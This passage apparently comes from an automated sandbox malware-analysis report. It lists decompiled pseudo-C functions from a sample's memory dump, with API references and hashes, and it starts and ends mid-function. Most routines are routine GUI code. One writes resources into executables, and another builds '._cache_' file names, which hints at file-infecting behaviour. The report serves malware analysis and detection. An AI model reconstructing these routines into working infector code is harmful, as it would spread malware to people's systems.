                                                    					_t14 = _t57 + 0x80; // 0x94000000
                                                    					E004250B0( *_t14, 8);
                                                    					_t30 = GetStockObject(0xd);
                                                    					_t15 = _t57 + 0x88; // 0x90000000
                                                    					E00424FCC( *_t15, _t30, _t72);
                                                    				} else {
                                                    					_t41 = CreateFontIndirectA( &_v185);
                                                    					_t11 = _t57 + 0x80; // 0x94000000
                                                    					E00424FCC( *_t11, _t41, _t72);
                                                    					_t45 = CreateFontIndirectA( &_v245);
                                                    					_t13 = _t57 + 0x88; // 0x90000000
                                                    					E00424FCC( *_t13, _t45, _t72);
                                                    				}
                                                    				_t16 = _t57 + 0x80; // 0x94000000
                                                    				E00424E10( *_t16, 0xff000017);
                                                    				_t17 = _t57 + 0x88; // 0x90000000
                                                    				E00424E10( *_t17, 0xff000007);
                                                    				 *[fs:eax] = 0xff000007;
                                                    				_push(0x4588f0);
                                                    				if( *0x49ebb8 != 0) {
                                                    					_t38 =  *0x49ebb8; // 0x0
                                                    					return E0045AD24(_t38, _v5);
                                                    				}
                                                    				return 0;
                                                    			}

                                                    APIs
                                                    • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004587F8
                                                    • CreateFontIndirectA.GDI32(?), ref: 00458805
                                                    • GetStockObject.GDI32(0000000D), ref: 0045881B
                                                      • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                    • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00458844
                                                    • CreateFontIndirectA.GDI32(?), ref: 00458854
                                                    • CreateFontIndirectA.GDI32(?), ref: 0045886D
                                                    • GetStockObject.GDI32(0000000D), ref: 00458893
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                    • String ID:
                                                    • API String ID: 2891467149-0
                                                    • Opcode ID: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                    • Instruction ID: c8c9ae32e1ca622756d665ee7f261621c5687007f21876862268219cdbc985ab
                                                    • Opcode Fuzzy Hash: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                    • Instruction Fuzzy Hash: 9E318330B042449FE750FBA9DC42B9973A4EB44305F9440BABD08EB2D7DE78A949C729
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 710 437d70-437dad SetWindowLongA GetWindowLongA 711 437daf-437dbc GetWindowLongA 710->711 712 437dcd-437e16 SetPropA * 2 call 422ba4 710->712 711->712 713 437dbe-437dc8 SetWindowLongA 711->713 714 437e1c-437e24 712->714 713->712
                                                    C-Code - Quality: 100%
                                                    			E00437D70(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                    				char _v8;
                                                    				void* _t20;
                                                    				void* _t21;
                                                    				void* _t27;
                                                    				void* _t31;
                                                    				void* _t35;
                                                    				intOrPtr* _t43;
                                                    
                                                    				_t43 =  &_v8;
                                                    				_t20 =  *0x49bc20; // 0x0
                                                    				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
                                                    				_t21 =  *0x49bc20; // 0x0
                                                    				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
                                                    				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
                                                    					SetWindowLongA(_a4, 0xfffffff4, _a4);
                                                    				}
                                                    				_t27 =  *0x49bc20; // 0x0
                                                    				SetPropA(_a4,  *0x49eb26 & 0x0000ffff, _t27);
                                                    				_t31 =  *0x49bc20; // 0x0
                                                    				SetPropA(_a4,  *0x49eb24 & 0x0000ffff, _t31);
                                                    				_t35 =  *0x49bc20; // 0x0
                                                    				 *0x49bc20 = 0; // executed
                                                    				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
                                                    				return  *_t43;
                                                     			}

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LongWindow$Prop
                                                    • String ID:
                                                    • API String ID: 3887896539-0
                                                    • Opcode ID: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                    • Instruction ID: b5f16ed505960de4fc23b1fb6768328cc78d5017c86fd9e1eb6bf423726d3339
                                                    • Opcode Fuzzy Hash: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                    • Instruction Fuzzy Hash: 0111CCB5504208BFDB10DF9DDD84EAA37E8EB1C354F10462AF914DB2A1DB34E9409BA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E00457FC8(char __edx, void* __edi) {
                                                    				char _v5;
                                                    				void* __ebx;
                                                    				void* __ecx;
                                                    				void* __ebp;
                                                    				intOrPtr _t25;
                                                    				intOrPtr* _t28;
                                                    				intOrPtr* _t29;
                                                    				intOrPtr* _t48;
                                                    				intOrPtr _t59;
                                                    				intOrPtr _t60;
                                                    				intOrPtr _t61;
                                                    				intOrPtr _t62;
                                                    				intOrPtr _t65;
                                                    				void* _t66;
                                                    				char _t67;
                                                    				void* _t77;
                                                    				struct HDC__* _t78;
                                                    				void* _t79;
                                                    				void* _t80;
                                                    
                                                    				_t77 = __edi;
                                                    				_t67 = __edx;
                                                    				if(__edx != 0) {
                                                    					_t80 = _t80 + 0xfffffff0;
                                                    					_t25 = L00403F10(_t25, _t79);
                                                    				}
                                                    				_v5 = _t67;
                                                    				_t65 = _t25;
                                                    				L00421B3C(_t66, 0);
                                                    				_t28 =  *0x49d878; // 0x49b510
                                                    				 *((intOrPtr*)(_t28 + 4)) = _t65;
                                                    				 *_t28 = 0x45836c;
                                                    				_t29 =  *0x49d888; // 0x49b518
                                                    				 *((intOrPtr*)(_t29 + 4)) = _t65;
                                                    				 *_t29 = 0x458378;
                                                    				E00458384(_t65);
                                                    				 *((intOrPtr*)(_t65 + 0x3c)) = GetKeyboardLayout(0);
                                                    				 *((intOrPtr*)(_t65 + 0x4c)) = L00403BBC(1);
                                                    				 *((intOrPtr*)(_t65 + 0x50)) = L00403BBC(1);
                                                    				 *((intOrPtr*)(_t65 + 0x54)) = L00403BBC(1);
                                                    				 *((intOrPtr*)(_t65 + 0x58)) = L00403BBC(1);
                                                    				 *((intOrPtr*)(_t65 + 0x7c)) = L00403BBC(1);
                                                    				_t78 = GetDC(0);
                                                    				 *((intOrPtr*)(_t65 + 0x40)) = GetDeviceCaps(_t78, 0x5a);
                                                    				ReleaseDC(0, _t78);
                                                    				_t11 = _t65 + 0x58; // 0x45122c6e
                                                    				_t48 =  *0x49dae4; // 0x49e91c
                                                    				 *((intOrPtr*)( *_t48))(0, 0, E004547A0,  *_t11);
                                                    				 *((intOrPtr*)(_t65 + 0x84)) = E00424C3C(1);
                                                    				 *((intOrPtr*)(_t65 + 0x88)) = E00424C3C(1);
                                                    				 *((intOrPtr*)(_t65 + 0x80)) = E00424C3C(1);
                                                    				E004587A4(_t65, _t65, _t66, _t77);
                                                    				_t15 = _t65 + 0x84; // 0x38004010
                                                    				_t59 =  *_t15;
                                                    				 *((intOrPtr*)(_t59 + 0xc)) = _t65;
                                                    				 *((intOrPtr*)(_t59 + 8)) = 0x458680;
                                                    				_t18 = _t65 + 0x88; // 0x90000000
                                                    				_t60 =  *_t18;
                                                    				 *((intOrPtr*)(_t60 + 0xc)) = _t65;
                                                    				 *((intOrPtr*)(_t60 + 8)) = 0x458680;
                                                    				_t21 = _t65 + 0x80; // 0x94000000
                                                    				_t61 =  *_t21;
                                                    				 *((intOrPtr*)(_t61 + 0xc)) = _t65;
                                                    				 *((intOrPtr*)(_t61 + 8)) = 0x458680;
                                                    				_t62 = _t65;
                                                    				if(_v5 != 0) {
                                                    					L00403F68(_t62);
                                                    					_pop( *[fs:0x0]);
                                                    				}
                                                    				return _t65;
                                                     			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CapsDeviceKeyboardLayoutRelease
                                                    • String ID: 5B
                                                    • API String ID: 3331096196-3738334870
                                                    • Opcode ID: 5487fb6c7b3bcedcedcd71127f0cf86c88c6ea033be2a968eb4a0643db19cfd2
                                                    • Instruction ID: 7c78f0e896318b154a236a51f14d482704da40fbffa7cbfd833c934430294294
                                                    • Opcode Fuzzy Hash: 5487fb6c7b3bcedcedcd71127f0cf86c88c6ea033be2a968eb4a0643db19cfd2
                                                    • Instruction Fuzzy Hash: 2331EA706052049FD740EF2AD8C1B497BE5FB05319F4480BEEC08DF367DA7AA9498B59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                    			E004348A8(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				long _t27;
                                                    				long _t34;
                                                    				int _t42;
                                                    				int _t43;
                                                    				intOrPtr _t50;
                                                    				int _t54;
                                                    				void* _t57;
                                                    				void* _t60;
                                                    
                                                    				_v12 = 0;
                                                    				_v8 = __ecx;
                                                    				_t54 = __edx;
                                                    				_t57 = __eax;
                                                    				_push(_t60);
                                                    				_push(0x434993);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t60 + 0xfffffff8;
                                                    				if(__edx >= 0) {
                                                    					_t42 = SendMessageA(E00441704( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0);
                                                    					if(_t42 < 0) {
                                                    						_t43 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xbb, _t54 - 1, 0);
                                                    						if(_t43 >= 0) {
                                                    							_t27 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc1, _t43, 0);
                                                    							if(_t27 != 0) {
                                                    								_t42 = _t43 + _t27;
                                                    								E00404CCC( &_v12, _v8, 0x4349ac);
                                                    								goto L6;
                                                    							}
                                                    						}
                                                    					} else {
                                                    						E00404CCC( &_v12, 0x4349ac, _v8);
                                                    						L6:
                                                    						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xb1, _t42, _t42);
                                                    						_t34 = E00404E80(_v12);
                                                    						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc2, 0, _t34); // executed
                                                    					}
                                                    				}
                                                    				_pop(_t50);
                                                    				 *[fs:eax] = _t50;
                                                    				_push(0x43499a);
                                                    				return E004049C0( &_v12);
                                                     			}

                                                    APIs
                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004348E4
                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00434913
                                                    • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0043492F
                                                    • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0043495A
                                                    • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00434978
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 355f4deacd5125564ffb9ba19f0dd5d69ef2a983a7f0a38bbff004384fc211bf
                                                    • Instruction ID: 60fe2270a456efbc5898118594648b470be5076c4c12df513f5ffd0388d1f25b
                                                    • Opcode Fuzzy Hash: 355f4deacd5125564ffb9ba19f0dd5d69ef2a983a7f0a38bbff004384fc211bf
                                                    • Instruction Fuzzy Hash: A5219BB1644704ABE710ABB6CC82F9B76ACEF84718F10453EB501A73D2DB78BD00C559
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 89%
                                                    			E00454A44(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				void* _t41;
                                                    				void* _t54;
                                                    				void* _t61;
                                                    				struct HMENU__* _t64;
                                                    				struct HMENU__* _t70;
                                                    				intOrPtr _t77;
                                                    				void* _t79;
                                                    				intOrPtr _t81;
                                                    				intOrPtr _t83;
                                                    				intOrPtr _t87;
                                                    				void* _t92;
                                                    				intOrPtr _t98;
                                                    				void* _t111;
                                                    				intOrPtr _t113;
                                                    				void* _t116;
                                                    
                                                    				_t109 = __edi;
                                                    				_push(__edi);
                                                    				_v20 = 0;
                                                    				_t113 = __edx;
                                                    				_t92 = __eax;
                                                    				_push(_t116);
                                                    				_push(0x454c0a);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t116 + 0xfffffff0;
                                                    				if(__edx == 0) {
                                                    					L7:
                                                    					_t39 =  *((intOrPtr*)(_t92 + 0x248));
                                                    					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
                                                    						E0044E3BC(_t39, 0, _t109, 0);
                                                    					}
                                                    					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
                                                    						_t113 = 0;
                                                    					}
                                                    					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
                                                    					if(_t113 != 0) {
                                                    						L00421C0C(_t113, _t92);
                                                    					}
                                                    					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
                                                    						_t41 = L00441A08(_t92);
                                                    						__eflags = _t41;
                                                    						if(_t41 != 0) {
                                                    							SetMenu(E00441704(_t92), 0); // executed
                                                    						}
                                                    						goto L30;
                                                    					} else {
                                                    						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
                                                    							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
                                                    								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
                                                    								if( *((char*)(_t92 + 0x22f)) != 1) {
                                                    									_t54 = L00441A08(_t92);
                                                    									__eflags = _t54;
                                                    									if(_t54 != 0) {
                                                    										SetMenu(E00441704(_t92), 0);
                                                    									}
                                                    								}
                                                    								goto L30;
                                                    							}
                                                    							goto L21;
                                                    						} else {
                                                    							L21:
                                                    							if(L00441A08(_t92) != 0) {
                                                    								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                    								_t110 = _t61;
                                                    								_t64 = GetMenu(E00441704(_t92));
                                                    								_t138 = _t61 - _t64;
                                                    								if(_t61 != _t64) {
                                                    									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                    									SetMenu(E00441704(_t92), _t70);
                                                    								}
                                                    								E0044E3BC(_t113, E00441704(_t92), _t110, _t138);
                                                    							}
                                                    							L30:
                                                    							if( *((char*)(_t92 + 0x22e)) != 0) {
                                                    								L00455B08(_t92, 1);
                                                    							}
                                                    							E0045497C(_t92);
                                                    							_pop(_t98);
                                                    							 *[fs:eax] = _t98;
                                                    							_push(0x454c11);
                                                    							return E004049C0( &_v20);
                                                    						}
                                                    					}
                                                    				}
                                                    				_t77 =  *0x49ebbc; // 0x0
                                                    				_t79 = E00458274(_t77) - 1;
                                                    				if(_t79 >= 0) {
                                                    					_v8 = _t79 + 1;
                                                    					_t111 = 0;
                                                    					do {
                                                    						_t81 =  *0x49ebbc; // 0x0
                                                    						if(_t113 ==  *((intOrPtr*)(E00458260(_t81, _t111) + 0x248))) {
                                                    							_t83 =  *0x49ebbc; // 0x0
                                                    							if(_t92 != E00458260(_t83, _t111)) {
                                                    								_v16 =  *((intOrPtr*)(_t113 + 8));
                                                    								_v12 = 0xb;
                                                    								_t87 =  *0x49d8b4; // 0x423118
                                                    								E00406A70(_t87,  &_v20);
                                                    								E0040D180(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
                                                    								E00404378();
                                                    							}
                                                    						}
                                                    						_t111 = _t111 + 1;
                                                    						_t10 =  &_v8;
                                                    						 *_t10 = _v8 - 1;
                                                    					} while ( *_t10 != 0);
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetMenu.USER32(00000000), ref: 00454B68
                                                    • SetMenu.USER32(00000000,00000000), ref: 00454B85
                                                    • SetMenu.USER32(00000000,00000000), ref: 00454BBA
                                                    • SetMenu.USER32(00000000,00000000,00000000,00454C0A), ref: 00454BD6
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$LoadString
                                                    • String ID:
                                                    • API String ID: 3688185913-0
                                                    • Opcode ID: 19c4293b5f1cdaa323bef84bcc34fad9663e5c1fef850695ee91956a4cd23356
                                                    • Instruction ID: 8074770e88abfcf8b34beed0e108b3c66a7315ec12ddf3ed763e984ff9a80418
                                                    • Opcode Fuzzy Hash: 19c4293b5f1cdaa323bef84bcc34fad9663e5c1fef850695ee91956a4cd23356
                                                    • Instruction Fuzzy Hash: 21518130A043445ADB61EF6A888575A7AA4AB8430DF0545BBEC059F3A3CA7CEC89875D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 58%
                                                    			E0042C5E4(int _a4) {
                                                    				void* __ebx;
                                                    				void* __ebp;
                                                    				signed int _t2;
                                                    				signed int _t3;
                                                    				void* _t7;
                                                    				int _t8;
                                                    				void* _t12;
                                                    				void* _t13;
                                                    				void* _t17;
                                                    				void* _t18;
                                                    
                                                    				_t8 = _a4;
                                                    				if( *0x49e928 == 0) {
                                                    					 *0x49e900 = E0042C4FC(0, _t8,  *0x49e900, _t17, _t18);
                                                    					_t7 =  *0x49e900(_t8); // executed
                                                    					return _t7;
                                                    				}
                                                    				_t3 = _t2 | 0xffffffff;
                                                    				_t12 = _t8 + 0xffffffb4 - 2;
                                                    				__eflags = _t12;
                                                    				if(__eflags < 0) {
                                                    					_t3 = 0;
                                                    				} else {
                                                    					if(__eflags == 0) {
                                                    						_t8 = 0;
                                                    					} else {
                                                    						_t13 = _t12 - 1;
                                                    						__eflags = _t13;
                                                    						if(_t13 == 0) {
                                                    							_t8 = 1;
                                                    						} else {
                                                    							__eflags = _t13 - 0xffffffffffffffff;
                                                    							if(_t13 - 0xffffffffffffffff < 0) {
                                                    								_t3 = 1;
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				__eflags = _t3 - 0xffffffff;
                                                    				if(_t3 != 0xffffffff) {
                                                    					return _t3;
                                                    				} else {
                                                    					return GetSystemMetrics(_t8);
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 0042C646
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    • KiUserCallbackDispatcher.NTDLL ref: 0042C60C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                    • String ID: GetSystemMetrics
                                                    • API String ID: 54681038-96882338
                                                    • Opcode ID: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                    • Instruction ID: e76955a9c08610525c92f9aeab2c1040e91631f36ff756307eb2880b474183d5
                                                    • Opcode Fuzzy Hash: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                    • Instruction Fuzzy Hash: 6EF0B4B07045649ACB709B3DBEC962F7645A7A5374FE0AF33A111472D1C2BCA842529D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 62%
                                                    			E00474B04(intOrPtr __eax, void* __ebx, char __ecx, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				char _v13;
                                                    				void* _v20;
                                                    				intOrPtr _v24;
                                                    				void* _t33;
                                                    				int _t45;
                                                    				char _t48;
                                                    				void* _t53;
                                                    				intOrPtr _t61;
                                                    				intOrPtr _t63;
                                                    				void* _t67;
                                                    				void* _t68;
                                                    				intOrPtr _t69;
                                                    
                                                    				_t67 = _t68;
                                                    				_t69 = _t68 + 0xffffffec;
                                                    				_v12 = __ecx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				E00404E70(_v12);
                                                    				_push(_t67);
                                                    				_push(0x474bff);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t69;
                                                    				_v24 = E00409A7C(_v8);
                                                    				E00409A90(_v8, 0x80);
                                                    				_t33 = BeginUpdateResourceA(E00404E80(_v8), 0); // executed
                                                    				_t53 = _t33;
                                                    				_v13 = _t53 != 0;
                                                    				if(_v13 == 0) {
                                                    					E00409A90(_v8, _v24);
                                                    					_pop(_t61);
                                                    					 *[fs:eax] = _t61;
                                                    					_push(0x474c06);
                                                    					return E004049E4( &_v12, 2);
                                                    				} else {
                                                    					_push(_t67);
                                                    					_push(0x474bd2);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t69;
                                                    					_v20 = E0040275C(0);
                                                    					_t45 = UpdateResourceA(_t53, 0xa, E00404E80(_v12), 0, _v20, 0);
                                                    					asm("sbb eax, eax");
                                                    					_v13 = _t45 + 1;
                                                    					if(EndUpdateResourceA(_t53, 0) == 0 || _v13 == 0) {
                                                    						_t48 = 0;
                                                    					} else {
                                                    						_t48 = 1;
                                                    					}
                                                    					_v13 = _t48;
                                                    					_pop(_t63);
                                                    					 *[fs:eax] = _t63;
                                                    					_push(0x474bd9);
                                                    					return E0040277C(_v20);
                                                    				}
                                                    			}

                                                    APIs
                                                      • Part of subcall function 00409A7C: GetFileAttributesA.KERNEL32(00000000,?,00474B38,00000000,00474BFF), ref: 00409A87
                                                      • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
                                                      • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AAB
                                                    • BeginUpdateResourceA.KERNEL32 ref: 00474B53
                                                    • UpdateResourceA.KERNEL32(00000000,0000000A,00000000,00000000,?,00000000), ref: 00474B93
                                                    • EndUpdateResourceA.KERNEL32 ref: 00474BA4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ResourceUpdate$AttributesFile$BeginErrorLast
                                                    • String ID:
                                                    • API String ID: 3622334292-0
                                                    • Opcode ID: 0c6025a9ba0c3fa00e0f0c327aa18df6933148c4a27423e708942d437b537846
                                                    • Instruction ID: 52e1684931c8bafc800cdd43f2787b7e22df09697c22c7a3fc8d55225dfd733d
                                                    • Opcode Fuzzy Hash: 0c6025a9ba0c3fa00e0f0c327aa18df6933148c4a27423e708942d437b537846
                                                    • Instruction Fuzzy Hash: A6216470B04244AFDB01EBB5DC42BAEB7A9EB45704F5144BBF404F2691D778AE10D658
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004015B4(void* __eax, void** __edx) {
                                                    				void* _t3;
                                                    				void** _t8;
                                                    				void* _t11;
                                                    				long _t14;
                                                    
                                                    				_t8 = __edx;
                                                    				if(__eax >= 0x100000) {
                                                    					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                    				} else {
                                                    					_t14 = 0x100000;
                                                    				}
                                                    				_t8[1] = _t14;
                                                    				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                    				_t11 = _t3;
                                                    				 *_t8 = _t11;
                                                    				if(_t11 != 0) {
                                                    					_t3 = E00401468(0x49e5ec, _t8);
                                                    					if(_t3 == 0) {
                                                    						VirtualFree( *_t8, 0, 0x8000);
                                                    						 *_t8 = 0;
                                                    						return 0;
                                                    					}
                                                    				}
                                                    				return _t3;
                                                    			}

                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018BD), ref: 004015E3
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018BD), ref: 0040160A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Virtual$AllocFree
                                                    • String ID: I
                                                    • API String ID: 2087232378-1966777607
                                                    • Opcode ID: c1566d8f6abf6d80f03d096eeda82e70b725eacd03a30ec4fb637c5d0c7dd738
                                                    • Instruction ID: 653e09eb2cf8d2b73dae0cb6bd44d4e3f867a6d1f4cfde1ef7f913290877d0a1
                                                    • Opcode Fuzzy Hash: c1566d8f6abf6d80f03d096eeda82e70b725eacd03a30ec4fb637c5d0c7dd738
                                                    • Instruction Fuzzy Hash: FEF02772F003202BEB3059AA4CC1B535AC49F857A4F194076FD08FF3E9D6B58C0142A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 57%
                                                    			E00477AD8(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                    				char _v8;
                                                    				intOrPtr _v12;
                                                    				char _v13;
                                                    				char _v14;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				char _v28;
                                                    				char _v32;
                                                    				char _v36;
                                                    				char _v40;
                                                    				char _v56;
                                                    				char _v72;
                                                    				char _v76;
                                                    				char _v80;
                                                    				void* __ecx;
                                                    				struct HINSTANCE__* _t54;
                                                    				void* _t65;
                                                    				void* _t67;
                                                    				intOrPtr _t120;
                                                    				void* _t123;
                                                    				struct HINSTANCE__* _t130;
                                                    				struct HINSTANCE__* _t133;
                                                    				intOrPtr _t141;
                                                    				intOrPtr _t145;
                                                    				intOrPtr _t146;
                                                    				intOrPtr _t153;
                                                    				intOrPtr _t157;
                                                    				intOrPtr _t161;
                                                    				intOrPtr _t162;
                                                    
                                                    				_t159 = __esi;
                                                    				_t158 = __edi;
                                                    				_t161 = _t162;
                                                    				_t120 = 9;
                                                    				do {
                                                    					_push(0);
                                                    					_push(0);
                                                    					_t120 = _t120 - 1;
                                                    				} while (_t120 != 0);
                                                    				_t1 =  &_v8;
                                                    				 *_t1 = _t120;
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_push(__edi);
                                                    				_v13 =  *_t1;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				_push(_t161);
                                                    				_push(0x477dae);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t162;
                                                    				_t118 = E00404E80(_v8);
                                                    				_t54 =  *0x49e668; // 0x400000
                                                    				if(FindResourceA(_t54, _t53, 0xa) != 0) {
                                                    					_v14 = 1;
                                                    					L00409F48( &_v28);
                                                    					_push(_v28);
                                                    					_push(0x477dc8);
                                                    					_push("._cache_");
                                                    					E00402B68(0,  &_v36);
                                                    					L00409E18(_v36,  &_v32);
                                                    					_push(_v32);
                                                    					E00404D40();
                                                    					_push(_t161);
                                                    					_push(0x477d03);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t162;
                                                    					_t65 = E00409A48(_v24, __eflags);
                                                    					__eflags = _t65;
                                                    					if(_t65 != 0) {
                                                    						_t67 = E00474C10(_v24, _t118, _v8, __edi, __esi);
                                                    						__eflags = _t67;
                                                    						if(_t67 != 0) {
                                                    							E00409A90(_v24, 0x80);
                                                    							L00409BAC(_v24);
                                                    							E00404BB8( &_v56, _t118);
                                                    							_t130 =  *0x49e668; // 0x400000
                                                    							_v20 = E0041E0D0(_t130, 1, 0xa, _v56);
                                                    							_push(_t161);
                                                    							_push(0x477ca2);
                                                    							_push( *[fs:eax]);
                                                    							 *[fs:eax] = _t162;
                                                    							E0041DD9C(_v20, _t118, _v24, _t158);
                                                    							_pop(_t153);
